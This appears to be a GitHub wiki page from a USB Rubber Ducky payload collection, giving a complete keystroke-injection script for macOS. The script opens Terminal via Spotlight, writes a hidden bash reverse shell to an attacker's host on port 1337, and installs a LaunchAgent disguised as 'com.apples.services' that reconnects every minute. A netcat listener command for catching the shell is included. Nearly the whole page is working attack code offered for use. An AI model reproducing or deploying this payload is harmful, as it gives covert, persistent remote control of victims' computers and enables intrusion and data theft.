Payload OSX User Backdoor - a3rd/USB-Rubber-Ducky GitHub Wiki
-
Author - Patrick Mosca
-
Insert ducky. This script will created a persistent backdoor as the current user. It works by injecting code into a terminal from Spotlight. This payload was encoded with v2.4 on firmware duck_v2.1.hex. Change to your IP address or domain name and port number.
-
A good tutorial on the payload here: patrickmosca.com/root-a-mac-in-10-seconds-or-less/
REM Patrick Mosca REM A simple script for creating a persistent backdoor on OSX. REM Change mysite.com to your domain name or IP address REM Change 1337 to your port number REM Catch the shell with 'nc -l -p 1337' REM http://patrickmosca.com/root-a-mac-in-10-seconds-or-less/ DELAY 1000 GUI SPACE STRING terminal DELAY 500 ENTER DELAY 500 STRING mkdir ~/Library/.hidden ENTER DELAY 200 STRING echo '#!/bin/bash ENTER STRING bash -i >& /dev/tcp/mysite.com/1337 0>&1 ENTER STRING wait' > ~/Library/.hidden/connect.sh ENTER DELAY 500 STRING chmod +x ~/Library/.hidden/connect.sh ENTER DELAY 200 STRING mkdir ~/Library/LaunchAgents ENTER DELAY 200 STRING echo '<plist version="1.0"> ENTER STRING <dict> ENTER STRING <key>Label</key> ENTER STRING <string>com.apples.services</string> ENTER STRING <key>ProgramArguments</key> ENTER STRING <array> ENTER STRING <string>/bin/sh</string> ENTER STRING <string>'$HOME'/Library/.hidden/connect.sh</string> ENTER STRING </array> ENTER STRING <key>RunAtLoad</key> ENTER STRING <true/> ENTER STRING <key>StartInterval</key> ENTER STRING <integer>60</integer> ENTER STRING <key>AbandonProcessGroup</key> ENTER STRING <true/> ENTER STRING </dict> ENTER STRING </plist>' > ~/Library/LaunchAgents/com.apples.services.plist ENTER DELAY 200 STRING chmod 600 ~/Library/LaunchAgents/com.apples.services.plist ENTER DELAY 200 STRING launchctl load ~/Library/LaunchAgents/com.apples.services.plist ENTER DELAY 200 GUI q
Catch the shell with netcat:
nc -l -p 1337